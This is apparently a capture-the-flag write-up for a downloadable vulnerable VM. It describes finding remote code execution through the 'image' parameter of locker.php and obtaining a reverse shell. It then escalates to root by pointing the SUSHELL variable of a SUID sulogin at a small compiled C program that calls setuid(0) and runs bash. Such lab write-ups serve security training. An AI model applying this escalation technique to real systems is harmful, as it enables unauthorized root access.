Machines can be download here. Easy but also interesting one.
Nmap scan ports, only 80 is open.
Open main page, very simple.
Check source code, found locker.php.
Click "Model 1", then redirect to locker.php and display a picture.
Obviously, the number "1" for param "image" is part of filename, because if we change it to 2 or 3, we will see different pictures.
At first, I think maybe it is LFI. After some check, I found it is a RCE.
Then we can get reverse shell.
Check SUID binary, we can find an interesting file.
In fact, I enum a lot in the machines, but found no other ways to privilege escalation. So we have to use sulogin.
First, if we execute sulogin directly, we can only get a shell with no root privilege.
Then check the man page of sulogin, we find a key env variable "SUSHELL".
ENVIRONMENT sulogin looks for the environment variable SUSHELL or sushell to determine what shell to start. If the envi‐ ronment variable is not set, it will try to execute root's shell from /etc/passwd. If that fails, it will fall back to /bin/sh.
Code a fake shell in C:
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void){
setuid(0);
setgid(0);
system("/bin/bash");
}Compile it.
gcc -o exp exp.c
Upload it to /tmp in VM, chmod +x, then change SUSHELL environment variable.
Then run sulogin again, and we get ROOT!
